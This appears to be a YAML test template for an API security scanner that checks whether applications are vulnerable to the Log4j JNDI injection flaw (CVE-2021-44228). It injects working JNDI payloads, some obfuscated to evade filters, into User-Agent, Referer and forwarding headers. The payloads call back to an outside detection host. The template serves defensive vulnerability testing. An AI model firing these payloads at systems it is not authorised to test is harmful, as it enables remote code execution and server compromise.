---
id: FRAMEWORK_RCE_LOG4J
info:
  name: "Framework RCE - Log4j"
  description: "Tests whether applications using Log4j are vulnerable to Remote Code Execution through JNDI injection."
  details: "This test injects Log4j JNDI payloads into headers to check if the application processes them and triggers SSRF, indicating a Log4j RCE vulnerability."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_LOG4J
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94
  cve:
    - CVE-2021-44228

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
  or:
    - request_headers:
        for_one:
          key:
            regex: "^user-agent$|^User-Agent$|^referer$|^Referer$|^X-Forwarded-For$|^X-Real-IP$"
            extractMultiple: headerKeys

wordLists:
  # Log4j JNDI payloads
  log4jPayloads:
    - "${jndi:ldap://test-services.akto.io/${random_uuid}}"
    - "${jndi:https://test-services.akto.io/${random_uuid}}"
    - "${jndi:rmi://test-services.akto.io/${random_uuid}}"
    - "${${lower:jndi}:${lower:ldap}://test-services.akto.io/${random_uuid}}"
    - "${${upper:jndi}:${upper:ldap}://test-services.akto.io/${random_uuid}}"
    - "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://test-services.akto.io/${random_uuid}}"

execute:
  type: single
  requests:
    - req:
        - send_ssrf_req:
            url: "https://test-services.akto.io/store_uuid/${random_uuid}"
        - modify_header:
            ${headerKeys}: "${log4jPayloads}"

validate:
  response_payload:
    length:
      gt: 0
  ssrf_url_hit: ${random_uuid}
